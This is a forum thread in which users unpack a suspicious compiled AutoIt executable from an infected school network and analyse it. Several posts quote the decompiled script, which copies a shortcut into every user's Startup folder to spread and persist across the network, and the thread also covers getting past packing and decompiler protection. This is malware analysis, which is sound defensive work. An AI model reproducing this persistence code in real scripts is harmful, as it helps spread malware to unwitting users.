Unpacking A Compiled Autoit .exe File?

[IAmABanana]

Hi,

I was wondering, is there a way to unpack a compiled autoit file?

I got infected with a weird autoit file somehow, and i guess its a keylogger.

it thats the case, then his email adress or FTP server adress should be in it.

I saw it was compiled with a (probably modified) UPX.

The origional file size was 118 Kb, and i already unpacked if half to 336 KB, and i can see half of the functions, but still not enough to get much info about what it does.

Soo, is there a way to open that script, and see its functions? or is there an unpacker that unpacks it correct?

Gr.

[Xenobiologist]

HI,

Autoit itself delivers an unpacker. But maybe the exe was secured with a passoword.

Give it a try.

So long,

Mega

[IAmABanana]

HI,

Autoit itself delivers an unpacker. But maybe the exe was secured with a passoword.

Give it a try.

So long,

Mega

hmm.. i tryed that, and it says something like "this is not a compiled autoit script" or something like that.

but, it has a autoit icon, and it was named ai.exe, and its packed the same.

On a forum a saw "This special exe2aut.exe will autofilling the passphrase and decompile every AutoIT_3.1-scriptfile"

But, the link they gave to it is death. Does anyone here has that?

[Xenobiologist]

hmm.. i tryed that, and it says something like "this is not a compiled autoit script" or something like that.

but, it has a autoit icon, and it was named ai.exe, and its packed the same.

On a forum a saw "This special exe2aut.exe will autofilling the passphrase and decompile every AutoIT_3.1-scriptfile"

But, the link they gave to it is death. Does anyone here has that?

HI,

as far as I know, there is a decompiler, but it runs only with old autoit.exe files. So, you won't get any further by getting the link.

So long,

Mega

Edited May 8, 2006 by th.meger

[IAmABanana]

HI,

as far as I know, there is a decompiler, but it runs only with old autoit.exe files. So, you won't get any further by getting the link.

So long,

Mega

Hi,

I dumped the packer correct now

according the the data, its

Length Of Struc: 01B8h
Length Of Value: 0034h
Type Of Struc:   0000h
Info:           VS_VERSION_INFO
Signature:     FEEF04BDh
Struc Version:   1.0
File Version:   3.1.1.0
Product Version: 3.1.1.0
File Flags Mask: 0.23
File Flags:   
File OS:         WINDOWS32
File Type:     UNKNOWN
File SubType:   UNKNOWN
File Date:     00:00:00  00/00/0000

     Struc has Child(ren). Size: 348 bytes.

Child Type:      StringFileInfo
Language/Code Page: 2057/1200
Comments:          http://www.autoitscript.com/autoit3/compiled.html
FileDescription:    
FileVersion:        3, 1, 1, 0

Child Type:      VarFileInfo
Translation:        2057/1200

But, i still cant really see what it does, couse its spoiled with all kind of autoit functions, and i dont think it uses all of them.

look, http://img443.imageshack.us/img443/8476/look5vj.gif

this makes it kinda hard to actually see what it does.

any suggestions?

[w0uter]

post the script here and ill make a dump of the script.

if it is hostile i will post it here.

[seandisanti]

Hi,

I dumped the packer correct now

according the the data, its

Length Of Struc: 01B8h
Length Of Value: 0034h
Type Of Struc:   0000h
Info:           VS_VERSION_INFO
Signature:     FEEF04BDh
Struc Version:   1.0
File Version:   3.1.1.0
Product Version: 3.1.1.0
File Flags Mask: 0.23
File Flags:   
File OS:         WINDOWS32
File Type:     UNKNOWN
File SubType:   UNKNOWN
File Date:     00:00:00  00/00/0000

     Struc has Child(ren). Size: 348 bytes.

Child Type:      StringFileInfo
Language/Code Page: 2057/1200
Comments:          http://www.autoitscript.com/autoit3/compiled.html
FileDescription:    
FileVersion:        3, 1, 1, 0

Child Type:      VarFileInfo
Translation:        2057/1200

But, i still cant really see what it does, couse its spoiled with all kind of autoit functions, and i dont think it uses all of them.

look, http://img443.imageshack.us/img443/8476/look5vj.gif

this makes it kinda hard to actually see what it does.

any suggestions?

you're going about it the wrong way. so you know. you should just get the newest UPX (it's free) and unpack it directly. then you'll have the source. (assuming it's not password protected) using a real time debugger like the one you're using, the only hope that you have is that the info you're looking for (e-mail or web address) may be in the referenced text strings, but not likely because of the way that the interpreter and source are just packaged together, and the code is not actually compiled in the typical sense.

[IAmABanana]

post the script here and ill make a dump of the script.

if it is hostile i will post it here.

ok, here it is

edit: @cameronsdad, UPX 2.00D is the newest, infact, that cant unpack it. that says it not packed with UPX or give a 0000X0 error

upx125w tho can unpack it, but not to a autoit source, but a c++ compiled.exe (acourding to PEID)

autoit_thing.rar

Edited May 8, 2006 by IAmABanana

[IAmABanana]

Bump, and solved.

k, nvm, a friend sended me a modded unpacker. that just gets the code from the file itself, and then unpacks it.

; <AUT2EXE VERSION: 3.1.1.0>

; ----------------------------------------------------------------------------
; <AUT2EXE INCLUDE-START: F:\AutoIt\aa.au3>
; ----------------------------------------------------------------------------

FileChangeDir("C:\Documents and Settings")
; Shows the filenames of all files in the current directory
$search = FileFindFirstFile("*.*")

; Check if the search was successful
If $search = -1 Then
    MsgBox(0, "Error", "No files/directories matched the search pattern")
    Exit
EndIf

While 1
    $file = FileFindNextFile($search)
    If @error Then ExitLoop
    If $file = "." Then

    Else
        If $file = ".." Then
    Else
        FileCopy("H:\link2.lnk","C:\Documents and Settings\"&$file&"\Menu Start\Programma's\Opstarten",1)
    EndIf
    EndIf
WEnd

; Close the search handle
FileClose($search)

; ----------------------------------------------------------------------------
; <AUT2EXE INCLUDE-END: F:\AutoIt\aa.au3>
; ----------------------------------------------------------------------------

[seandisanti]

Bump, and solved.

k, nvm, a friend sended me a modded unpacker. that just gets the code from the file itself, and then unpacks it.

; <AUT2EXE VERSION: 3.1.1.0>

; ----------------------------------------------------------------------------
; <AUT2EXE INCLUDE-START: F:\AutoIt\aa.au3>
; ----------------------------------------------------------------------------

FileChangeDir("C:\Documents and Settings")
; Shows the filenames of all files in the current directory
$search = FileFindFirstFile("*.*")

; Check if the search was successful
If $search = -1 Then
    MsgBox(0, "Error", "No files/directories matched the search pattern")
    Exit
EndIf

While 1
    $file = FileFindNextFile($search)
    If @error Then ExitLoop
    If $file = "." Then

    Else
        If $file = ".." Then
    Else
        FileCopy("H:\link2.lnk","C:\Documents and Settings\"&$file&"\Menu Start\Programma's\Opstarten",1)
    EndIf
    EndIf
WEnd

; Close the search handle
FileClose($search)

; ----------------------------------------------------------------------------
; <AUT2EXE INCLUDE-END: F:\AutoIt\aa.au3>
; ----------------------------------------------------------------------------

ok... so it doesn't do anything.

[IAmABanana]

ok... so it doesn't do anything.

well, actually, yes it does

C:\Documents and Settings\"&$file&"\Menu Start\Programma's\Opstarten

would get something like C:\Documents and Settings\{username}\Menu Start\Programma's\Opstarten

= startup folder

H:\link2.lnk is a shortcut to another virus like file...

[w0uter]

aww and i was just finsished eating

; <AUT2EXE VERSION: 3.1.1.0>

; ----------------------------------------------------------------------------
; <AUT2EXE INCLUDE-START: F:\AutoIt\aa.au3>
; ----------------------------------------------------------------------------

FileChangeDir("C:\Documents and Settings")
; Shows the filenames of all files in the current directory
$search = FileFindFirstFile("*.*")

; Check if the search was successful
If $search = -1 Then
    MsgBox(0, "Error", "No files/directories matched the search pattern")
    Exit
EndIf

While 1
    $file = FileFindNextFile($search)
    If @error Then ExitLoop
    If $file = "." Then

    Else
        If $file = ".." Then
    Else
        FileCopy("H:\link2.lnk","C:\Documents and Settings\"&$file&"\Menu Start\Programma's\Opstarten",1)
    EndIf
    EndIf
WEnd

; Close the search handle
FileClose($search)

; ----------------------------------------------------------------------------
; <AUT2EXE INCLUDE-END: F:\AutoIt\aa.au3>
; ----------------------------------------------------------------------------

[seandisanti]

well, actually, yes it does

C:\Documents and Settings\"&$file&"\Menu Start\Programma's\Opstarten

would get something like C:\Documents and Settings\{username}\Menu Start\Programma's\Opstarten

= startup folder

H:\link2.lnk is a shortcut to another virus like file...

what does that file do? the one that's linked to.

[JSThePatriot]

This doesnt really do much... Unless the H: drive was plugged to your computer. This code is harmless.

You cant copy a .lnk file from H if you dont have an H... most computers dont. I am assuming someone had a small utility that they didnt expect someone was going to use.

If you have excluded some information then please feel free to show me, but the above code is harmless. It wont even run when in AutoIt without an H drive.

Try harder next time,

JS

[seandisanti]

This doesnt really do much... Unless the H: drive was plugged to your computer. This code is harmless.

You cant copy a .lnk file from H if you dont have an H... most computers dont. I am assuming someone had a small utility that they didnt expect someone was going to use.

If you have excluded some information then please feel free to show me, but the above code is harmless. It wont even run when in AutoIt without an H drive.

Try harder next time,

JS

that's how i saw it too, so was looking for more info when he said that it ran 'another virus like file'

[JSThePatriot]

that's how i saw it too, so was looking for more info when he said that it ran 'another virus like file'

To me its all hype...until he shows something more definite. Sure it "could" link to a virus, IF indeed you had an H: Drive it could copy that "bad" link from.

Too many variables to really be a virus infected script. It was definitely not this script that caused issues. Unless of course someone knew he had a drive H, and a short cut on it with that name and was able to also know that it went to something bad and just copied it to the start up folder of every available user.

Now again that is VERY unlikely

JS

[IAmABanana]

To me its all hype...until he shows something more definite. Sure it "could" link to a virus, IF indeed you had an H: Drive it could copy that "bad" link from.

Too many variables to really be a virus infected script. It was definitely not this script that caused issues. Unless of course someone knew he had a drive H, and a short cut on it with that name and was able to also know that it went to something bad and just copied it to the start up folder of every available user.

Now again that is VERY unlikely

JS

Well, couse you care so much,

Our school network was infected with this, and some other crap files...

when you login, your personal files we go to h:\(documents and settings)

so, this think first copyed itself from the startup folder to the startup folder of the user.

then, if the user logsin somewhere else, the file gets called from h:\documents and settings\startup, and copys itself to the c:\ startup

so if someone else logsin in that same computer, he also has it, and it he logs in somewhere else, that gets infected...

and all of a sudden the entire network has it...

what the .exe does the link2.ink is linkt to is not really important,

but now you see this think was part of a virus code (a noobie coded one, but still...)

[JSThePatriot]

Well, couse you care so much,

Our school network was infected with this, and some other crap files...

when you login, your personal files we go to h:\(documents and settings)

so, this think first copyed itself from the startup folder to the startup folder of the user.

then, if the user logsin somewhere else, the file gets called from h:\documents and settings\startup, and copys itself to the c:\ startup

so if someone else logsin in that same computer, he also has it, and it he logs in somewhere else, that gets infected...

and all of a sudden the entire network has it...

what the .exe does the link2.ink is linkt to is not really important,

but now you see this think was part of a virus code (a noobie coded one, but still...)

Now you have extended us the courtesy of which you should have passed along in the first place. What the EXE does in the .lnk is the virus not this code. This code just ensures that the .exe will run no matter where you are.

Apparently it is someone in your school that knows a bit of AutoIt that created this script to copy that link to that EXE.

This file isnt an infection. If you have had any troubles it will be from the .EXE that the shortcut points to. After all that is the final destination of this script is to make sure that runs!

Again I state. The above script that has been shown to us is in no way harmful. It may be a nuisance, but you should have precautions that would keep these things from happening.

If the EXE isnt anything bad then there is nothing malicious about this program.

JS

[Jos]

C:\Documents and Settings\{username}\Menu Start\Programma's\Opstarten

Sounds Dutch to me ...

You want me to stop by and teach them a lesson ? ( and that won't be in AutoIt3) .

Now the question in my mind is: how is it possible to create a shortcut to a virus that is always available to everybody in the School network and will automatically be run? That would require some sort of elevated access to a server I assume.

Nice challenge these school networks